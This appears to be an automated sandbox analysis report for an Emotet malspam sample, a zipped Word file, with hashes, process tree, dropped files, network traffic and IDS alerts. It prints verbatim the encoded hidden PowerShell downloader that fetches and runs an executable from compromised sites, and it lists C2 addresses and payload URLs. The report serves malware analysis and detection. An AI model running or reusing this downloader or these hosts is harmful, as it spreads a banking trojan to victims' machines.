File name: | QPQB5 17_01_20.doc.zip |
Full analysis: | https://app.any.run/tasks/ea2586be-ad17-43cc-8eb7-5f4615c5fd3f |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 17, 2020, 20:26:56 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | A7719A9E95A7F24FCA51E2865583872A |
SHA1: | F70538CEF34C7208AC11D4C65BB820AD31DFB88C |
SHA256: | 27A2652E7BCA2BB8DE5892F8DA1341B571D643FE7AE2A10B08F716E0204139E7 |
SSDEEP: | 3072:gpp1937d/8y0f2Uk3qjPUrskDdUvQz/TKDCL05mb58bm:g77V0f2HqjPU38U58bm |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 788 |
---|---|
ZipBitFlag: | 0x0001 |
ZipCompression: | Deflated |
ZipModifyDate: | 2020:01:17 21:25:26 |
ZipCRC: | 0xb04eff91 |
ZipCompressedSize: | 171395 |
ZipUncompressedSize: | 250890 |
ZipFileName: | QPQB5 17_01_20.doc |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2828 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\QPQB5 17_01_20.doc.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
2648 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\QPQB5 17_01_20.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2824 | Powershell -w hidden -en JABCAHIAdwBuAGIAbABuAHUAcwBuAHkAbwB6AD0AJwBPAGMAdwByAG8AcQBrAHYAbgBhAGQAcgB0ACcAOwAkAEIAbABjAGMAcAB2AGYAZQAgAD0AIAAnADEAMAA4ACcAOwAkAE0AZgBmAHEAcgB5AGoAbAByAGYAYQA9ACcAQwBuAG0AegBlAGIAcwBqAG0AawBqAHIAdwAnADsAJABEAGYAcwBqAHUAdwBtAGQAdAB2AHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEIAbABjAGMAcAB2AGYAZQArACcALgBlAHgAZQAnADsAJABYAHUAdABzAHQAeQBtAGkAdQBtAGgAPQAnAEsAegBpAHAAbAB6AGsAbgByAHIAcABiACcAOwAkAFoAdQBuAHoAZgBsAGUAdwBrAHAAPQAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBlAGIAQwBMAGkARQBOAHQAOwAkAEsAbgBuAGcAcABzAGUAdwBpAD0AJwBoAHQAdABwADoALwAvAGIAaQB6AHQAcgBlAGUAbQBnAG0AdAAuAGMAbwBtAC8AdwBvAHIAZABwAHIAZQBzAHMALwA1AGcAdgBoADIAYgB2AHgAagBrAC0AYQBkAHkAbAA0AGQALQA1ADEAMAA1ADUALwAqAGgAdAB0AHAAOgAvAC8AYQBkAGEAbQBwAGUAdAB0AHkAYwByAGUAYQB0AGkAdgBlAC4AYwBvAG0ALwB4ADkAMgBrADIANQAvAFMAdABQAEgAaABVAHIALwAqAGgAdAB0AHAAOgAvAC8AcgBvAHMAZQBwAGUAcgBmAGUAaQB0AG8ALgBjAG8AbQAuAGIAcgAvAGwAbwBhAGQAaQBuAGcALwBpAG0AZQAwAGEAMwAtADUAZwBhAC0AMgA4ADcAMAA3ADIANgA1ADUAMwAvACoAaAB0AHQAcAA6AC8ALwBuAGcAdQBvAGkAZABlAHAAeAB1AG0AdQBvAG4AZwAuAHYAbgAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AUABCAHMARQBUAEoALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAHUAaQBsAGQAaQB0AGUAeABwAHIAZQBzAHMALgBjAG8ALgB1AGsALwBlAHgAYwBsAHUAcwBpAHYAZQAvAGcAdgBEAEsAVABWAC8AJwAuACIAUwBgAFAAbABJAHQAIgAoACcAKgAnACkAOwAkAFoAdgB2AHoAdQBvAHcAbwB4AD0AJwBFAHcAcABlAHMAbQB4AGsAegAnADsAZgBvAHIAZQBhAGMAaAAoACQASQB1AGgAbABjAGUAbwBiAHAAdQB3AHMAdQAgAGkAbgAgACQASwBuAG4AZwBwAHMAZQB3AGkAKQB7AHQAcgB5AHsAJABaAHUAbgB6AGYAbABlAHcAawBwAC4AIgBkAE8AdwBOAGwAYABvAGAAQQBkAEYAaQBsAEUAIgAoACQASQB1AGgAbABjAGUAbwBiAHAAdQB3AHMAdQAsACAAJABEAGYAcwBqAHUAdwBtAGQAdAB2AHIAKQA7ACQAQwB0AGYAeAB5AHoAZwBjAGUAcQBuAD0AJwBOAHkAbQBtAGIAdwB3AGIAdwBpAGcAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABEAGYAcwBqAHUAdwBtAGQAdAB2AHIAKQAuACIATABFAE4AYABHAFQAaAAiACAALQBnAGUAIAAyADEAOQA0ADAAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGEAYABSAHQAIgAoACQARABmAHMAagB1AHcAbQBkAHQAdgByACkAOwAkAFkAZQBzAHEAZwBnAGwAdABiAHUAPQAnAFcAaAB1AGgAcQByAGQAYwBxAHUAYQAnADsAYgByAGUAYQBrADsAJABEAGMAbABmAGwAeQB1AGQAcQBpAD0AJwBBAGgAbgBiAHUAdwBzAG8AbAB6ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AcgBwAHoAcgBzAGUAZQBoAD0AJwBFAGEAbgBxAHYAZABtAGYAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
820 | "C:\Users\admin\108.exe" | C:\Users\admin\108.exe | — | Powershell.exe |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
2456 | --9ef7d637 | C:\Users\admin\108.exe | 108.exe | |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
3396 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 108.exe |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
516 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | serialfunc.exe | |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2828 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2828.33976\QPQB5 17_01_20.doc | — | |
MD5:— | SHA256:— | |||
2648 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE440.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2648 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFEB32BBC7FD7FAE9A.TMP | — | |
MD5:— | SHA256:— | |||
2648 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF2E5D3A68612428D8.TMP | — | |
MD5:— | SHA256:— | |||
2824 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZLAKTQMVDCAX4N5LORKY.temp | — | |
MD5:— | SHA256:— | |||
2648 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:C1C99D92F4B815F400EDAEEE23849120 | SHA256:8DE84B2B56FDFBC1A2C047EE0B48CA35EC73A40E0B65BA8C172ED4545C7C62F8 | |||
2824 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2648 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:EEF4789F74EAED6B499188F6FF1B7E45 | SHA256:5E0151F5E26E3BB69B8F1677A60156E29DD67CD257829DA09509CA4D8547B2E9 | |||
2648 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:65E7B8B6BA728C2668759517722B82F1 | SHA256:6119F505FD9D78D2D93B36FE05D5C04EE82E23CA9D83E50BAECCC9A00324F659 | |||
2648 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\QPQB5 17_01_20.doc.LNK | lnk | |
MD5:4967D1FBF86929FFF8DA9134CE9685A2 | SHA256:FB423969B53E6C74ECACE4C3AA2996521566CA02302F5E6FF23C92719F8CB3C2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
516 | serialfunc.exe | POST | — | 98.192.74.164:80 | http://98.192.74.164/bLSVuWMcD4Yao5tBriL | US | — | — | malicious |
516 | serialfunc.exe | POST | 200 | 59.135.126.129:443 | http://59.135.126.129:443/PVWGs | JP | binary | 148 b | malicious |
2824 | Powershell.exe | GET | 404 | 203.175.174.69:80 | http://biztreemgmt.com/wordpress/5gvh2bvxjk-adyl4d-51055/ | SG | html | 315 b | suspicious |
2824 | Powershell.exe | GET | 200 | 160.153.138.71:80 | http://adampettycreative.com/x92k25/StPHhUr/ | US | executable | 332 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
516 | serialfunc.exe | 98.192.74.164:80 | — | Comcast Cable Communications, LLC | US | malicious |
2824 | Powershell.exe | 203.175.174.69:80 | biztreemgmt.com | SG.GS | SG | suspicious |
516 | serialfunc.exe | 59.135.126.129:443 | — | KDDI CORPORATION | JP | malicious |
2824 | Powershell.exe | 160.153.138.71:80 | adampettycreative.com | GoDaddy.com, LLC | US | malicious |
Domain | IP | Reputation |
---|---|---|
biztreemgmt.com |
| suspicious |
adampettycreative.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2824 | Powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2824 | Powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2824 | Powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
516 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M5 |
516 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M6 |
516 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
516 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M5 |
516 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M6 |
516 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
516 | serialfunc.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |